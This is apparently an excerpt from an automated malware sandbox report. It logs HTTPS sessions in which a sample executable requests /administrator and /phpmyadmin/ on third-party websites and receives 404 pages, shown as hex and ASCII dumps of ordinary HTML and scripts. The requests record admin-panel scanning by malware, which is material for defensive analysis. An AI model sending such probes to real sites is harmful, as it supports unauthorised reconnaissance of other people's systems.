                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                    Data Ascii: -scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name=
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f
                                                                                                                                                                                                    Data Ascii: -party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC189INData Raw: 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    116192.168.2.457373172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC176OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC636INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC733INData Raw: 37 64 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d33<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e
                                                                                                                                                                                                    Data Ascii: :void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c
                                                                                                                                                                                                    Data Ascii: !0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73
                                                                                                                                                                                                    Data Ascii: if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.s
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                    Data Ascii: [e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e)
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69
                                                                                                                                                                                                    Data Ascii: ndow.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator i
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65
                                                                                                                                                                                                    Data Ascii: )}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){le
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,cont
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26
                                                                                                                                                                                                    Data Ascii: i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    117192.168.2.457317104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC739INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, ma
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC630INData Raw: 37 63 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c
                                                                                                                                                                                                    Data Ascii: 7cbb<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://hightideinc.com/xmlrpc.php" /><script type="text/javascript">document.documentElement.cl
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 62 29 3a 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 64 69 76 69 2d 75 73 65 72 66 6f 6e 74 73 22 3e 40 66 6f 6e 74 2d 66 61 63 65 20
                                                                                                                                                                                                    Data Ascii: cument.getElementsByTagName("body")[0].appendChild(a)};"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",b):window.attachEvent&&window.attachEvent("onload",b):b()}();</script><style id="et-divi-userfonts">@font-face
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 69 76 69 20 76 2e 34 2e 32 33 2e 31 22 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d
                                                                                                                                                                                                    Data Ascii: /hightideinc.com/feed/" /><link rel="alternate" type="application/rss+xml" title="High Tide Inc. &raquo; Comments Feed" href="https://hightideinc.com/comments/feed/" /><meta content="Divi v.4.23.1" name="generator" /><link rel="stylesheet" id="wp-block-
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                                                                    Data Ascii: wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-siz
